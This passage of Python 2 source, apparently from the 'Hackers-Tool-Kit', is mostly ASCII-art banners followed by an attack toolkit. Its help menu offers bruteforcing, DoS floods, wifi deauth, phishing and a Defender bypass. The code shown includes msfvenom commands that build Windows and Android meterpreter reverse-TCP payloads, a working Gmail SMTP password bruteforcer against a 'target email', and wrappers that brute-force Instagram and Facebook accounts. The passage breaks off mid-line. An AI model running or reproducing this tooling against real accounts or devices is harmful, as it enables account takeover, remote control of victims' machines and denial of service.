██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + .---. + |---| + type |-\033[32m?\033[0m-| for help + |---| + .---^ - ^---. + :___________: + \033[31m▄█ █▄\033[0m | |//| \033[32m▄█ ▄█▄\033[0m + ███ ███ | |//| ███ ▄███▀ + ███ ███ | |//| ███▐██▀ + ███▄▄▄▄███ | |//| █████▀ + ███▀▀▀▀███ | |//| █████▄ + ███ ███ | |//| ███▐██▄ + ███ ███ | |.-| ███ ▀███▄ + \033[31m███ ███\033[0m |.-'**| \033[32m███ ▀█▀\033[0m + \***/ + \*\033[91m/\033[31m + V\033[0m + """.decode('utf-8') +def mainbanner18(): + print """ + Type \033[31m?\033[0m For\033[31m Help\033[0m +\033[31m╔═══╗ ╔═══╗ ╔═════════════════════╗ ╔═══╗ ╔═══╗ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m║ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTKHTKHTKHTKHTKHTK\033[31m║ ║\033[0mHTK\033[31m║ ╔═╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ╚════════╗\033[0mHTK\033[31m╔════════╝ ║\033[0mHTK\033[31m║ ╔╝\033[0mHTK\033[31m╔═╝ +║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║╔╝\033[0mHTK\033[31m╔╝ +║\033[0mHTK\033[31m╚═══════════╝\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK\033[31m╚╝\033[0mHTK\033[31m╔╝ +║\033[0mHTKHHHHHHHHHHHHHHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTK HTK\033[31m╔╝ +║\033[0mHTKTTTTTTTTTTTTTHTK\033[31m║ ║\033[0mHTK\033[31m║ ║\033[0mHTKHTK \033[31m╚╗\033[0m +║\033[31mHTKKKKKKKKKKKKKKHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m╔╗\033[31mHTK\033[0m╚═╗ +║\033[31mHTK\033[0m╔═══════════╗\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║╚═╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m╚╗ +║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ║\033[31mHTK\033[0m║ ╚╗\033[31mHTK\033[0m║ +╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ ╚═══╝ + """.decode('utf-8') + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,18) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() + if num == 10: + mainbanner10() + if num == 11: + mainbanner11() + if num == 12: + mainbanner12() + if num == 13: + mainbanner13() + if num == 14: + mainbanner14() + if num == 15: + mainbanner15() + if num == 16: + mainbanner16() + if num == 17: + mainbanner17() + if num == 18: + mainbanner18() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +update : update the hackers-tool-kit +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +foxhis : gather firefox history from privileged javascript shell +rhawk : run the RED_HAWK script (info gathering tool) +nano : open nano text editor +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl 